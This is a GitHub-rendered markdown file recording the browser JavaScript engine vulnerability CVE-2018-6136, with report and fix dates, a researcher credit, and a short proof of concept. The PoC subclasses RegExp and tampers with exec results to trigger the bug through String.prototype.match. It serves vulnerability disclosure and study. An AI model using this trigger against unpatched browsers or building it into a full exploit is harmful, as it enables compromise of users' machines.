Skip to content

Latest commit

 

History

History
23 lines (17 loc) · 358 Bytes

CVE-2018-6136.md

File metadata and controls

23 lines (17 loc) · 358 Bytes
Raw

CVE-2018-6136

  • Report: Apr 2018
  • Fix: Apr 2018
  • Credit: Peter Wong

PoC

class MyRegExp extends RegExp {
  exec(str) {
    const r = super.exec.call(this, str);
    r[0] = 0; // Value could be changed to something arbitrary
    return r;
  }
}

'a'.match(new MyRegExp('.', 'g'));

Reference